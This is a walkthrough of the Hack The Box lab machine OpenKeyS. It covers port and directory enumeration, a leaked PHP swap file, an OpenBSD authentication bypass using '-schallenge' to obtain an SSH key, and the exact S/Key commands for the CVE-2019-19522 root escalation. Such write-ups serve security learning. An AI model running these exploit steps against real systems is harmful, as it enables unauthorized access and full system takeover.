OpenKeyS was, at the time, one of the few boxes I had done where it revolved around exploiting published vulnerabilities. It was very fun and interesting to say the least. Even though it was rated as Medium, it was fairly easy to tackle if your enumeration was done right.
References
Enumeration
Masscan: Finding Open Ports
Here, we will be looking for any open ports, both TCP and UDP to then find our attack path once further port scanning as been completed.
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ sudo masscan -e tun1 -p1-65535,U:1-65535 10.10.10.199 --rate=1000 | tee OpenKeys_OpenPorts.log
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-09-13 15:13:54 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.199
Discovered open port 22/tcp on 10.10.10.199
Nmap: Port Scanning
Using the log file created from the masscan execution, we will filter the port numbers to simplify our lives. In this case as we only have to ports to enumerate, we could've saved that step.
At this point in my process, I was relying on aggressive scanning, which is technically not necessary and should not be done if we do not want to be detected.
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ PORTS=$(cat OpenKeys_OpenPorts.log | grep open | cut -d" " -f4 | cut -d"/" -f1 | xargs | tr " " ",")
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ nmap -A -sV -p $PORTS openkeys.htb -oN OpenKeys_PortScan.log -oX OpenKeys_PortScan.xml
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 11:18 EDT
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
| 256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_ 256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open http OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.11 seconds
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ nmap -sV -p 22 openkeys.htb --script vulners
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 11:31 EDT
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
|_ CVE-2014-9278 4.0 https://vulners.com/cve/CVE-2014-9278
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.43 seconds
Gobuster: Directory Enumeration
Given the web service exposed, it is the next step into our enumeration. At the same time, we must note that everything goes and the OpenBSD SSH service must also be researched.
Inspecting /includes gave us access to a swap file. We need to retrieve it in order to inspect it offline.
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ wget http://openkeys.htb/includes/auth.php.swp
--2020-09-13 12:40:05-- http://openkeys.htb/includes/auth.php.swp
Resolving openkeys.htb (openkeys.htb)... 10.10.10.199
Connecting to openkeys.htb (openkeys.htb)|10.10.10.199|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp’
auth.php.swp [ <=> ] 12.00K 29.4KB/s in 0.4s
2020-09-13 12:40:05 (29.4 KB/s) - ‘auth.php.swp’ saved [12288]
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ strings auth.php.swp
b0VIM 8.1
jennifer
openkeys.htb
/var/www/htdocs/includes/auth.php
3210
#"!
session_start();
session_destroy();
session_unset();
function close_session()
$_SESSION["username"] = $_REQUEST['username'];
$_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
$_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
$_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
$_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
$_SESSION["logged_in"] = True;
function init_session()
}
return False;
{
else
}
}
return True;
$_SESSION['last_activity'] = $time;
// Session is active, update last activity time and return True
{
else
}
return False;
close_session();
{
($time - $_SESSION['last_activity']) > $session_timeout)
if (isset($_SESSION['last_activity']) &&
$time = $_SERVER['REQUEST_TIME'];
// Has the session expired?
{
if(isset($_SESSION["logged_in"]))
// Is the user logged in?
session_start();
// Start the session
$session_timeout = 300;
// Session timeout in seconds
function is_active_session()
return $retcode;
system($cmd, $retcode);
$cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
function authenticate($username, $password)
<?php
bash
As you can see on line 15, we found jennifer as the potential user.
After researching the SSH banner information, it seems there are some vulnerabilities that we can attempt.
In this case, we can try -schallenge as user in the http request, but we need to specify the potential user jennifer in the request header, which we will provide along with the session cookie.
BINGO!! What we just retrieved is the SSH private key from 'jennifer'. Let's use it to access the system as this user.
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ ssh -i jennifer.key jennifer@openkeys.htb
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
openkeys$ id
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
openkeys$ ls
user.txt
openkeys$ cat user.txt
36ab21********************1d2b10
And we have found the user flag! Let follow on and attempt to escalate privileges by using a related vulnerability as the one we used against httpd.
Privilege Escalation
The vulnerability used to bypass authentication against httpd is associated as well with CVE-2019-19522, in which local privilege escalation can be achieved via S/Key and YubiKey. In this case, we will leverage S/Key.
openkeys$ cd /tmp
openkeys$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root
openkeys$ chmod 0600 /etc/skey/root
openkeys$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password:
S/Key Password [echo on]:
Sorry
openkeys$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN
openkeys# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
As shown above, by following the associated vulnerability specifications, we were able to escalate privileges. Now, let's grab the root flag:
openkeys# pwd
/root
openkeys# ls
.Xdefaults .cshrc .forward .profile .viminfo root.txt
.composer .cvsrc .login .ssh dead.letter
openkeys# cat dead.letter
Date: Sun, 13 Sep 2020 15:40:02 +0000 (UTC)
From: root (Cron Daemon)
To: root
Subject: Cron <root@openkeys> /usr/bin/find /tmp -name "sess*" -amin +5 -exec rm {} \;
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <PATH=/bin:/sbin:/usr/bin:/usr/sbin>
X-Cron-Env: <HOME=/var/log>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
rm: /tmp/sess_gvhju8kvqk0m4dup24fhsm3c15: No such file or directory
rm: /tmp/sess_euod42diulnrrbir7cp2ehdioa: No such file or directory
rm: /tmp/sess_j094qg8rs6kpk76k7ukb5tlt0c: No such file or directory
rm: /tmp/sess_m447es74eb7k33ro5c66bs2hiq: No such file or directory
rm: /tmp/sess_hg0vdh8grjilq15r26da6b2um8: No such file or directory
openkeys# cat root.txt
f3a553********************fc6efa
The OpenBSD Authentication Bypass Vulnerability is one that can be used against multiple service hosted on OpenBSD.
